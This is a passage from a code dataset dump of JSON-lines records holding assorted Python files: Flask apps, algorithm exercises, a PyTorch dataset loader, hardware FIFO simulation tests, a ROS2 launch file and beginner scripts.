name + '.png' + '%%' + path + '/' + name + '.hdr\\n')\n            name_list.append(name)\n    f.close()","repo_name":"godwantma/HDR_reconstruction","sub_path":"split_image.py","file_name":"split_image.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42218273408","text":"#!/usr/local/bin/python\r\r\n\r\r\nfrom flask import Flask, render_template, jsonify, request, redirect, url_for, session, make_response\r\r\nimport secrets\r\r\n\r\r\nimport MySQLdb\r\r\n\r\r\n# My API functions\r\r\nfrom api import *\r\r\n\r\r\napp = Flask(__name__, static_url_path='')\r\r\n\r\r\napp.secret_key = secrets.token_urlsafe(16)\r\r\n\r\r\n#app.debug = True\r\r\n\r\r\n@app.route('/')\r\r\ndef index():\r\r\n    return render_template('index.html')\r\r\n    \r\r\n@app.route(\"/searchTheWiki\", methods = [\"POST\"])\r\r\ndef searchTheWiki():\r\r\n    queryTitle = request.form['title']\r\r\n    numSentences = request.form['sentences']\r\r\n    summary = \"\"\r\r\n    image = \"\"\r\r\n    status = \"\"\r\r\n    try:\r\r\n        title = searchForPage(queryTitle)\r\r\n        title = title[0]\r\r\n        \r\r\n        if (isVideoGame(title)):\r\r\n            summary = getPageSummary(title, numSentences)\r\r\n            image = getPageImage(title)\r\r\n            url = getURL(title)\r\r\n            status=\"Success\"\r\r\n            categories = getCategories(title)\r\r\n            return jsonify(title=title, summary=summary, image=image, status=status, categories=categories, url=url)\r\r\n        else:\r\r\n            status = \"ERROR: That is not a video game! (If it is, please add `(video game)` to the end of the title\"\r\r\n    except Exception as e:\r\r\n        print(e)\r\r\n        status = \"Page does not exist\"\r\r\n    return jsonify(status=status)\r\r\n","repo_name":"Quantaxer/Game-Backlogger","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36060879555","text":"\ndef combinationSum(candidates, target):\n    result = []\n    nums = sorted(candidates)\n    if sum(nums) == target: return [nums]\n    if sum(nums) < target: return []\n    def tracking(temp, nums, target):\n        if sum(temp) == target:\n            if sorted(temp) not in result:\n                result.append(sorted(temp))\n            return\n        if sum(temp) > target:\n            return\n        for i in nums:\n            temp.append(i)\n            nums.remove(i)\n            Newnums = list(nums)\n            tracking(temp, Newnums, target)\n            nums.insert(0, i)\n            temp.pop()\n    tracking([], nums, target)\n    return result\n\n\nif __name__ == \"__main__\":\n    candidates = [1, 2]\n    target = 2\n    print(combinationSum(candidates, target))\n\n\n\n","repo_name":"ficherfisher/leetcode","sub_path":"39CombinationSum.py","file_name":"39CombinationSum.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5683605258","text":"first_name = input('What is your first name? ').title()\nlast_name = input('What is your last name? ').title()\nyear_born = int(input('When were you born? '))\ncurrent_year = 2021\nage = current_year - year_born\ncity = input('Name of the city your are living in? ').title()\ncountry = input('Conuntry you are living in? ').title()\ngender = input('What is your gender F or M? ' ).lower()\npronoun = ''\n\nif gender in ('f', 'female'):\n    pronoun = 'She'\nelif gender in ('m', 'male'):\n    pronoun = 'He' \n\n\nprint(f'{pronoun} is {first_name} {last_name}. {pronoun} is {age}. 
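
The tiling loops in the split_image record above crop fixed-size windows and keep only full tiles. The same indexing can be sketched in plain NumPy, with no OpenCV and no files on disk (the array shape here is arbitrary):

import numpy as np

img = np.zeros((512, 768, 3), dtype=np.uint8)   # stand-in for a loaded image
size = 256
tiles = [img[y:y + size, x:x + size]            # same slicing as in the loop above
         for y in range(0, img.shape[0], size)
         for x in range(0, img.shape[1], size)
         if img[y:y + size, x:x + size].shape[:2] == (size, size)]
assert len(tiles) == 6                          # 2 rows x 3 columns of full tiles
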
{pronoun} lives in {city} {country} ')","repo_name":"meronfan/Five-Days-of-Python","sub_path":"Day3/conditional.py","file_name":"conditional.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33406220704","text":"from time import sleep\n\nfrom ulakbus.models import BAPProje\nfrom ulakbus.models import User\nfrom ulakbus.models import Okutman\nfrom ulakbus.models import Personel\n\nfrom zengine.lib.test_utils import BaseTestCase\n\n\nclass TestCase(BaseTestCase):\n\n def lane_change_massage_kontrol(self, resp):\n assert resp.json['msgbox']['title'] == 'Teşekkürler!'\n assert resp.json['msgbox']['msg'] == 'Bu iş akışında şuan için gerekli adımları ' \\\n 'tamamladınız. İlgili kişiler, iş akışına ' \\\n 'katılmaları için haberdar edildiler.'\n\n def test_bap_proje_basvuru(self):\n user = User.objects.get(username='ogretim_uyesi_1')\n personel = Personel.objects.get(user=user)\n okutman = Okutman.objects.get(personel=personel) # Hanife Şener\n\n proje = BAPProje()\n proje.ad = \"Bap Test proje iptal talebi projesi\"\n proje.yurutucu = okutman\n proje.durum = 5\n proje.save()\n\n for i in range(4):\n if i == 1:\n token, user = self.get_user_token(username='ogretim_uyesi_1')\n self.prepare_client('/bap_yurutucu_degisikligi_talebi', user=user, token=token)\n resp = self.client.post()\n\n assert resp.json['forms']['form'][0]['helpvalue'] == \"%s projeniz için \" \\\n \"bulunduğunuz iptal talebi \" \\\n \"reddedilmiştir. \" \\\n \"Red Açıklaması: Red edildi.\" \\\n % proje.ad\n self.client.post(form={'bitir': 1})\n sleep(1)\n continue\n elif i == 3:\n token, user = self.get_user_token(username='ogretim_uyesi_1')\n self.prepare_client('/bap_yurutucu_degisikligi_talebi', user=user, token=token)\n resp = self.client.post()\n\n assert resp.json['forms']['form'][0]['helpvalue'] == \"%s projeniz için \" \\\n \"bulunduğunuz iptal talebi \" \\\n \"koordinasyon birimi \" \\\n \"tarafından kabul edilip \" \\\n \"Komisyon Gündemine \" \\\n \"alınmıştır.\" % proje.ad\n\n self.client.post(form={'bitir': 1})\n sleep(1)\n continue\n else:\n self.prepare_client('/bap_proje_iptal_talep', user=user)\n\n self.client.post()\n\n resp = self.client.post(form={'proje': proje.key,\n 'ilerle': 1})\n\n assert resp.json['object'][u'Proje Adı'] == proje.ad\n\n resp = self.client.post(form={'aciklama': 'Kişisel sebeblerden dolayı '\n 'bap test projesinin iptalini istiyorum.',\n 'onay': 1})\n\n assert resp.json['forms']['form'][0]['helpvalue'] == \"%s projesini iptal için onaya \" \\\n \"yollayacaksınız. 
Yollamak \" \\\n \"istiyor musunuz ?\" % proje.ad\n\n resp = self.client.post(form={'gonder': 1})\n\n self.lane_change_massage_kontrol(resp)\n\n sleep(1)\n\n token, user = self.get_user_token(username='bap_koordinasyon_birimi_1')\n self.prepare_client('/bap_yurutucu_degisikligi_talebi', user=user, token=token)\n\n resp = self.client.post()\n\n assert resp.json['object']['İptal Talep Açıklama'] == \"Kişisel sebeblerden dolayı \" \\\n \"bap test projesinin \" \\\n \"iptalini istiyorum.\"\n\n if i == 0:\n self.client.post(form={'reddet': 1})\n\n resp = self.client.post(form={'red_aciklama': 'Red edildi.',\n 'red_gonder': 1})\n else:\n resp = self.client.post(cmd='onayla', form={'onayla': 1}, object_key=proje.key)\n assert resp.json['forms']['schema']['title'] == \"Proje İptal Talebi Talebini \" \\\n \"Komisyona Yolla\"\n resp = self.client.post(form={'komisyona_gonder': 1})\n\n self.lane_change_massage_kontrol(resp)\n","repo_name":"zetaops/ulakbus","sub_path":"tests/test_bap_proje_iptal_talep.py","file_name":"test_bap_proje_iptal_talep.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"tr","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"20240255185","text":"import os\nimport numpy as np\nimport random\nimport torch\nimport torch.utils.data as data\nfrom tqdm import tqdm \nfrom torchvision import transforms\nfrom utils.file_processing import image_file_to_array\nclass BongardDataset(data.Dataset):\n\t\"\"\"\n\t\thttps://github.com/NVlabs/Bongard-LOGO\n\t\"\"\"\n\n\tdef __init__(self, random_seed=123, batch_type='train', img_dim=(512,512), batch_size=None, one_hot_size=3, root='./ShapeBongard_V2'):\n\t\t'''\n\t\tArgs:\n\t\t- batch_type: training, testing or validation set\n\t\t- img_dim: (height, weight) of image in input layer\n\t\t- root: directory where dataset will be stored\n\t\t- one_hot_size: one_hot_vector size of a label (left, right, unlabeled)\n\t\tUsage: \n\t\t\ttr_dataset = BongardDataset(batch_type='train', one_hot_size=3, root='./ShapeBongard_V2')\n\t\t\t# returns tr_dataset.y, tr_dataset.x_paths\n\t\t'''\n\n\t\tsuper(BongardDataset, self).__init__()\n\t\tself.seed = random_seed\n\t\tself.root = root\n\t\tself.batch_type = batch_type\n\t\tself.batch_size = batch_size\n\t\tself.one_hot_size = one_hot_size\n\t\tself.img_h, self.img_w = img_dim\n\t\tself.img_dim = self.img_h*self.img_w\n\t\t\n\t\t# as stated in paper\n\t\tself.num_train = 9300\n\t\tself.num_val = 900\n\n\t\t# in dataset dir\n\t\tself.num_classes = 2\n\t\tself.num_samples_per_class = 7\n\t\t\n\n\t\t# resize original 512x512 image to 256x246\n\t\tself.transform = transforms.Compose([transforms.ToPILImage(mode=None),\n\t\t\t\t\t\t\t\t\t\t\t\ttransforms.Resize(img_dim)])\n\n\t\tif not os.path.exists(self.root):\n\t\t\traise RuntimeError('Dataset not found.')\n\n\t\t\n\t\t# basic, free-form, abstract --> images --> pos, neg --> img.png\n\t\t# problem_type/images/problem_class/img.png\n\t\tproblem_folders = [os.path.join(self.root, problem_type, 'images', problem_class) #img path\n\t\t\t\t\t\t for problem_type in os.listdir(self.root) # basic, free-form, abstract\n\t\t\t\t\t\t if os.path.isdir(os.path.join(self.root, problem_type))\n\t\t\t\t\t\t for problem_class in os.listdir(os.path.join(self.root, problem_type, 'images')) # neg, pos\n\t\t\t\t\t\t if os.path.isdir(os.path.join(self.root, problem_type, 'images', problem_class))]\n\n\t\trandom.seed(self.seed)\n\t\trandom.shuffle(problem_folders)\n\n\t\tif self.batch_type == 'train':\n\t\t\tself.folders = 
problem_folders[: self.num_train]\n\t\telif self.batch_type == 'val':\n\t\t\tself.folders = problem_folders[self.num_train : self.num_train + self.num_val]\n\t\telif self.batch_type == 'test':\n\t\t\tself.folders = problem_folders[self.num_train + self.num_val:]\n\t\telse:\n\t\t\traise ValueError('Batch must be of type Train, Validation or Test')\n\n\t\tget_label = lambda folder, class_name : [class_name for problem_img in \n\t\t\t\t\t\tos.listdir(os.path.join(folder, str(class_name)))]\n\t\tprint(\"Fetching Y\"+batch_type+\" labels\")\n\t\tself.y = np.array([list(zip(np.eye(one_hot_size)[get_label(problem, 0)], \n\t\t\t\t\tnp.eye(one_hot_size)[get_label(problem, 1)])) \n\t\t\t\t\tfor problem in tqdm(self.folders)])\n\t\tassert self.y.shape == (len(self.folders), self.num_samples_per_class, \n\t\t\t\t\t\t\t\tself.num_classes, self.one_hot_size)\n\n\t\tprint(\"Fetching X\"+batch_type+\" paths\")\t\t\n\t\tget_img_path = lambda folder, class_name: [os.path.join(folder, str(class_name), problem_img) \n\t\t\t\t\t\t\tfor problem_img in os.listdir(os.path.join(folder, str(class_name)))]\n\t\tself.x_paths = np.array([list(zip(get_img_path(problem, 0), get_img_path(problem, 1))) \n\t\t\t\t\t\t\tfor problem in tqdm(self.folders)])\n\t\tassert self.x_paths.shape == (len(self.folders), self.num_samples_per_class, self.num_classes)\n\n\tdef __getitem__(self, idx):\n\t\t'''\n\t\tArgs:\n\t\t- idx: problem at idx\n\t\t\n\t\tReturns:\n\t\t- problem_imgs: img data for each img in problem, shape: num_samples_per_class x img_dim\n\t\t- labels: labels for each img in problem, shape: num_samples_per_class x num_classes x one_hot_size\n\t\t- problem_path: str obj is path to problem\n\t\t'''\n\t\t\n\t\tget_imgs_at_idx = lambda x: torch.stack([torch.stack([image_file_to_array(class_1, self.transform), \n\t\t\t\t\t\t\t\t\t\timage_file_to_array(class_2, self.transform)])\n\t\t\t\t\t\t\t\t\t\tfor class_1, class_2 in x])\n\n\t\tbatch_imgs = torch.stack([get_imgs_at_idx(batch_i) for batch_i in self.x_paths[idx]])\n\n\t\t#assert batch_imgs.shape == (self.batch_size, self.num_samples_per_class, \n\t\t#\t\t\t\t\t\t\tself.num_classes, self.img_dim)\n\t\t\n\t\tbatch_y = torch.from_numpy(self.y[idx])\n\t\t\n\t\tbatch_path = [os.path.split(path)[0] for path in self.x_paths[idx][:, 1, 1]]\n\t\t\n\t\treturn batch_imgs, self.y[idx], batch_path\n\n\tdef __len__(self):\n\t\treturn len(self.x_paths)\n\n#class BongardLOGODataset(data.Dataset):\n\"\"\"\nLOGO vectors for program induction\n\"\"\"\n\n","repo_name":"aishniparab/myaiframework","sub_path":"datasets/bongard_dataset.py","file_name":"bongard_dataset.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17410081905","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\n\nfrom hwt.interfaces.std import FifoReader, FifoWriter\nfrom hwt.interfaces.utils import addClkRstn\nfrom hwt.simulator.simTestCase import SimTestCase\nfrom hwt.synthesizer.unit import Unit\nfrom hwtLib.mem.fifo import Fifo\nfrom hwtSimApi.constants import CLK_PERIOD\nfrom hwtSimApi.triggers import Timer, WaitWriteOnly\n\n\nclass FifoReaderPassTrought(Unit):\n\n def _declr(self):\n addClkRstn(self)\n self.din = FifoReader()\n self.dout = FifoReader()._m()\n\n def _impl(self):\n self.dout(self.din)\n\n\nclass FifoWriterPassTrought(FifoReaderPassTrought):\n\n def _declr(self):\n addClkRstn(self)\n self.din = FifoWriter()\n self.dout = FifoWriter()._m()\n\n\nclass 
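
The label construction in the Bongard dataset record above leans on a NumPy idiom that is easy to miss: indexing an identity matrix with class indices yields one-hot rows. A minimal illustration with made-up labels:

import numpy as np

labels = [0, 1, 1, 2]
one_hot = np.eye(3)[labels]          # row i of eye(3) is the one-hot vector for class i
assert one_hot.shape == (4, 3)
assert one_hot[0].tolist() == [1.0, 0.0, 0.0]
assert one_hot[3].tolist() == [0.0, 0.0, 1.0]
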
FifoReaderAgentTC(SimTestCase):\n CLK = CLK_PERIOD\n\n @classmethod\n def setUpClass(cls):\n cls.u = FifoReaderPassTrought()\n cls.compileSim(cls.u)\n\n def test_fifoReader(self):\n u = self.u\n self.randomize(u.din)\n self.randomize(u.dout)\n\n ref = [i for i in range(30)]\n u.din._ag.data.extend(ref)\n self.runSim(120 * self.CLK)\n\n self.assertValSequenceEqual(u.dout._ag.data, ref)\n\n\nclass FifoWriterAgentTC(SimTestCase):\n CLK = CLK_PERIOD\n\n @classmethod\n def setUpClass(cls):\n cls.u = FifoWriterPassTrought()\n cls.compileSim(cls.u)\n\n def test_fifoWriter(self):\n u = self.u\n\n self.randomize(u.din)\n self.randomize(u.dout)\n\n ref = [i for i in range(30)]\n u.din._ag.data.extend(ref)\n self.runSim(120 * self.CLK)\n\n self.assertValSequenceEqual(u.dout._ag.data, ref)\n\n\nclass FifoTC(SimTestCase):\n ITEMS = 4\n IN_CLK = CLK_PERIOD\n OUT_CLK = CLK_PERIOD\n CLK = max(IN_CLK, OUT_CLK) # clock used for resolving of sim duration\n\n @classmethod\n def setUpClass(cls):\n u = cls.u = Fifo()\n u.DATA_WIDTH = 8\n u.DEPTH = cls.ITEMS\n u.EXPORT_SIZE = True\n cls.compileSim(cls.u)\n\n def getFifoItems(self):\n m = self.rtl_simulator.io.memory\n return set([int(x.read()) for x in m])\n\n def getUnconsumedInput(self):\n return self.u.dataIn._ag.data\n\n def test_fifoSingleWord(self):\n u = self.u\n\n expected = [1]\n u.dataIn._ag.data.extend(expected)\n\n self.runSim(9 * self.CLK)\n\n collected = u.dataOut._ag.data\n self.assertValSequenceEqual(collected, expected)\n\n def test_fifoWriterDisable(self):\n u = self.u\n\n ref = [i + 1 for i in range(self.ITEMS)]\n u.dataIn._ag.data.extend(ref)\n\n def init():\n u.dataIn._ag.setEnable(False)\n return\n yield\n\n self.procs.append(init())\n\n self.runSim(8 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, [])\n self.assertValSequenceEqual(self.getUnconsumedInput(), ref)\n\n def test_normalOp(self):\n u = self.u\n\n expected = list(range(4))\n u.dataIn._ag.data.extend(expected)\n\n self.runSim(9 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, expected)\n\n def test_multiple(self, sizeValues=[\n 0, 1, 2, 3, 4, 4, 4, 4, 4,\n 3, 3, 3, 3, 3, 3, 3, 3, 3,\n 3, 3, 3, 3, 2, 1, 0, 0]):\n u = self.u\n\n def openOutputAfterWile():\n u.dataOut._ag.setEnable(False)\n yield Timer(self.CLK * 9)\n u.dataOut._ag.setEnable(True)\n\n self.procs.append(openOutputAfterWile())\n\n expected = list(range(2 * 8))\n u.dataIn._ag.data.extend(expected)\n\n self.runSim(27 * self.CLK)\n\n collected = u.dataOut._ag.data\n if u.EXPORT_SIZE:\n self.assertValSequenceEqual(\n u.size._ag.data, sizeValues)\n\n self.assertValSequenceEqual(collected, expected)\n\n def test_tryMore(self):\n u = self.u\n\n ref = [i + 1 for i in range(self.ITEMS * 3)]\n u.dataIn._ag.data.extend(ref)\n\n def init():\n yield WaitWriteOnly()\n u.dataOut._ag.setEnable(False)\n\n self.procs.append(init())\n\n self.runSim(self.ITEMS * 4 * self.CLK)\n\n collected = u.dataOut._ag.data\n self.assertSetEqual(self.getFifoItems(), set(ref[:self.ITEMS]))\n self.assertValSequenceEqual(collected, [])\n self.assertValSequenceEqual(self.getUnconsumedInput(), ref[self.ITEMS:])\n\n def test_tryMore2(self, capturedOffset=2):\n u = self.u\n\n ref = [i + 1 for i in range(self.ITEMS * 2)]\n u.dataIn._ag.data.extend(ref)\n\n def closeOutput():\n yield Timer(self.OUT_CLK * 4)\n u.dataOut._ag.setEnable(False)\n\n self.procs.append(closeOutput())\n self.runSim(15 * self.CLK)\n\n collected = [int(x) for x in u.dataOut._ag.data]\n\n self.assertSetEqual(self.getFifoItems(),\n 
set(ref[capturedOffset:self.ITEMS + capturedOffset]))\n se = self.assertSequenceEqual\n se(collected, ref[:capturedOffset])\n se(self.getUnconsumedInput(), ref[self.ITEMS + capturedOffset:])\n\n def test_randomizedIn(self):\n self._test_randomized(True, False)\n\n def test_randomizedOut(self):\n self._test_randomized(False, True)\n\n def test_randomizedAll(self):\n self._test_randomized(True, True)\n\n def _test_randomized(self, randIn, randOut):\n u = self.u\n LEN = 80\n ref = [i + 1 for i in range(LEN)]\n u.dataIn._ag.data.extend(ref)\n if randIn:\n self.randomize(u.dataIn)\n if randOut:\n self.randomize(u.dataOut)\n\n self.runSim(int(2.5 * LEN * self.CLK))\n\n collected = u.dataOut._ag.data\n self.assertSequenceEqual(collected, ref)\n\n def test_doloop(self):\n u = self.u\n u.dataIn._ag.data.extend([1, 2, 3, 4, 5, 6])\n\n self.runSim(12 * self.CLK)\n\n collected = u.dataOut._ag.data\n self.assertSequenceEqual([1, 2, 3, 4, 5, 6], collected)\n self.assertSequenceEqual([], u.dataIn._ag.data)\n\n def test_nop(self):\n u = self.u\n self.runSim(12 * self.CLK)\n self.assertEqual(len(u.dataOut._ag.data), 0)\n\n def test_stuckedData(self):\n u = self.u\n u.dataIn._ag.data.append(1)\n\n def init():\n yield WaitWriteOnly()\n u.dataOut._ag.setEnable(False)\n\n self.procs.append(init())\n\n self.runSim(12 * self.CLK)\n self.assertEqual(len(u.dataOut._ag.data), 0)\n\n def test_withPause(self):\n u = self.u\n ref = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n u.dataIn._ag.data.extend(ref)\n\n def pause():\n yield Timer(3 * self.OUT_CLK)\n u.dataOut._ag.setEnable_asMonitor(False)\n\n yield Timer(3 * self.OUT_CLK)\n u.dataOut._ag.setEnable_asMonitor(True)\n\n yield Timer(3 * self.IN_CLK)\n u.dataIn._ag.setEnable_asDriver(False)\n\n yield Timer(3 * self.IN_CLK)\n u.dataIn._ag.setEnable_asDriver(True)\n\n self.procs.append(pause())\n\n self.runSim(20 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, ref)\n self.assertSequenceEqual(self.getUnconsumedInput(), [])\n\n def test_withPause2(self):\n u = self.u\n ref = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n u.dataIn._ag.data.extend(ref)\n\n def pause():\n yield Timer(4 * self.OUT_CLK)\n u.dataOut._ag.setEnable_asMonitor(False)\n yield Timer(3 * self.OUT_CLK)\n u.dataOut._ag.setEnable_asMonitor(True)\n yield Timer(3 * self.IN_CLK)\n u.dataIn._ag.setEnable_asDriver(False)\n yield Timer(3 * self.IN_CLK)\n u.dataIn._ag.setEnable_asDriver(True)\n\n self.procs.append(pause())\n\n self.runSim(20 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, ref)\n self.assertSequenceEqual(self.getUnconsumedInput(), [])\n\n def test_passdata(self):\n u = self.u\n ref = [1, 2, 3, 4, 5, 6]\n u.dataIn._ag.data.extend(ref)\n\n self.runSim(12 * self.CLK)\n\n self.assertValSequenceEqual(u.dataOut._ag.data, ref)\n self.assertValSequenceEqual(self.getUnconsumedInput(), [])\n\n\nif __name__ == \"__main__\":\n _ALL_TCs = [FifoWriterAgentTC, FifoReaderAgentTC, FifoTC]\n testLoader = unittest.TestLoader()\n loadedTcs = [testLoader.loadTestsFromTestCase(tc) for tc in _ALL_TCs]\n suite = unittest.TestSuite(loadedTcs)\n runner = unittest.TextTestRunner(verbosity=3)\n runner.run(suite)\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/mem/fifo_test.py","file_name":"fifo_test.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"17938755823","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\n\nfrom launch import LaunchDescription\nfrom 
launch_ros.actions import Node\nfrom launch.actions import ExecuteProcess, IncludeLaunchDescription, RegisterEventHandler\nfrom launch.event_handlers import OnProcessExit\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration\nfrom launch_ros.substitutions import FindPackageShare\n\n\nimport xacro\nimport yaml\n\n\ndef generate_launch_description():\n\n #Joy_sub to motor_control node\n motor_node = Node(package='rpi_robot', executable='rpi_motor')\n\n #Camera_pub node\n cam_node = Node(package=\"v4l2_camera\",\n executable=\"v4l2_camera_node\",\n name=\"v4l2_camera_node\",\n parameters=[{\"image_size\": \"[640,480]\", \"camera_frame_id\": \"camera_link_optical\"}],\n )\n\n #\n rpi_robot_description_path = os.path.join(\n get_package_share_directory('rpi_robot_description'))\n\n #Getting robot urdf\n xacro_file = os.path.join(rpi_robot_description_path,\n 'urdf',\n 'rpi_robot.urdf.xacro')\n\n doc = xacro.parse(open(xacro_file))\n xacro.process_doc(doc)\n robot_description_config = doc.toxml()\n robot_description = {'robot_description': robot_description_config}\n\n #Robot_state_publisher node\n node_robot_state_publisher = Node(\n package='robot_state_publisher',\n executable='robot_state_publisher',\n output='screen',\n parameters=[robot_description]\n )\n\n #Lidar_pub node\n lidar_driver_node = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([\n FindPackageShare(\"ydlidar_ros2_driver\"), '/launch', '/ydlidar_launch.py'])\n )\n \n\n # Launch them all!\n return LaunchDescription([\n motor_node,\n cam_node,\n #node_robot_state_publisher,\n #lidar_driver_node\n ])\n","repo_name":"E12-CO/rpi_robot","sub_path":"launch/robot_launch.py","file_name":"robot_launch.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38122401340","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\ndef lowestCommonAncestor(root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root in (None, p, q): \n return root\n left = lowestCommonAncestor(root.left, p, q)\n right = lowestCommonAncestor(root.right, p, q)\n if left and right:\n return root # if p and q are respectively in the left and right subtrees of root, then root is their LCA\n else:\n return left if left else right # either one of p,q is in the subtree of root, or none is. 
If none is, this will eventually return None\n#time O(n)\n#space O(n)\n","repo_name":"0xspringtime/leetcode","sub_path":"0236n.py","file_name":"0236n.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39997952873","text":"'''\nConsecutive prime sum\nProblem 50\nThe prime 41, can be written as the sum of six consecutive primes:\n\n41 = 2 + 3 + 5 + 7 + 11 + 13\nThis is the longest sum of consecutive primes that adds to a prime below one-hundred.\n\nThe longest sum of consecutive primes below one-thousand that adds to a prime, contains 21 terms, and is equal to 953.\n\nWhich prime, below one-million, can be written as the sum of the most consecutive primes?\n'''\n\nfrom math import sqrt\nprimes = [2, 3]\n\n\ndef is_prime(a):\n    result = True\n    l = int(sqrt(a))\n    for p in primes:\n        if p > l:\n            break\n        elif a % p == 0:\n            result = False\n            break\n    return result\n\n\ndef main():\n\n    for i in range(5, 1000000, 2):\n        if is_prime(i):\n            primes.append(i)\n\n    #primes_f = [ i for i in primes if i < 1000]\n    print(\"step 1 done : \", len(primes))\n\n    sub = []\n    max_s = 0\n    max_l = 0\n    s = 0\n    sl = 0\n\n    for i in range(len(primes)):\n        sub = primes[:i + 1]\n        s = sum(sub)\n        sl = len(sub)\n        if s > 1000000:\n            break\n        if s in primes:\n            max_l = sl\n            max_s = s\n        else:\n            while (sl > max_l):\n                sub[:1] = []\n                sl = len(sub)\n                s = sum(sub)\n                if (s in primes):\n                    if sl > max_l:\n                        max_l = sl\n                        max_s = s\n\n    print(\" Done : \", max_s, \" len=\", max_l)\n\n\nif __name__ == '__main__':\n\n    main()\n","repo_name":"murli777/Project-Euler-Solutions","sub_path":"src/001-050/P050.py","file_name":"P050.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15310238463","text":"# Adding two lists together using for loops\n\n#first way\n\nlist_1 = [\"Shirt\", \"Pants\", \"Sweater\", \"Socks\", \"Jacket\"] \nlist_2 = [\"Hat\", \"Watch\", \"Shoes\"]\nfor list_3 in list_1:\n    list_3 = list_1 + list_2\nprint(list_3)\n#second way\nlist_1 = [\"Shirt\", \"Pants\", \"Sweater\", \"Socks\", \"Jacket\"]\nlist_2 = [\"Hat\", \"Watch\", \"Shoes\"]\nfor list_3 in list_2:\n    list_1.append(list_3)\nprint(list_1)\n\n#sum = 5\n#numbers = [1,10,2]\n#for sum in numbers:\n#print(sum +1)\n\nlist_1 = [1, 2, 3, 4]\nlist_2 = [5, 6, 7, 8]\nlist_5 = []\n\nlength = len(list_1)\nfor i in range(length):\n    result = list_1[i] + list_2[i]\n    print(list_1[i], \"+\" ,list_2[i], \"=\", result)\n    list_5.append(result)\nprint(list_5)","repo_name":"itsAimen/Python-Learning","sub_path":"Loops.py/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70905419665","text":"from dotenv import load_dotenv\nimport os\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nload_dotenv()\n\n\nclass Config(object):\n    DEBUG = False\n    TESTING = False\n    CSRF_ENABLED = True\n\n\nclass Prod(Config):\n    DEBUG = False\n\n\nclass Dev(Config):\n    DEVELOPMENT = True\n    DEBUG = True\n","repo_name":"DResthal/ConfigManageUtils","sub_path":"configApi/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14075512181","text":"def menu():\r\n    print(\"Menu: \")\r\n    print(\"[1] - Importar palabras clave.\")\r\n    print(\"[2] - Mostrar palabras 
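
The comments in the lowestCommonAncestor record above describe the two cases of the recursion. A tiny self-contained check (the function is restated compactly here so the snippet runs on its own; the tree values are arbitrary):

class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

def lca(root, p, q):
    # None, or reaching p/q itself, ends the recursion
    if root in (None, p, q):
        return root
    left = lca(root.left, p, q)
    right = lca(root.right, p, q)
    # p and q on different sides -> root is the split point; otherwise bubble up the non-empty side
    return root if (left and right) else (left or right)

root, l, r = TreeNode(3), TreeNode(5), TreeNode(1)
root.left, root.right = l, r
assert lca(root, l, r) is root       # nodes in different subtrees
assert lca(root, root, l) is root    # an ancestor is its own LCA
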
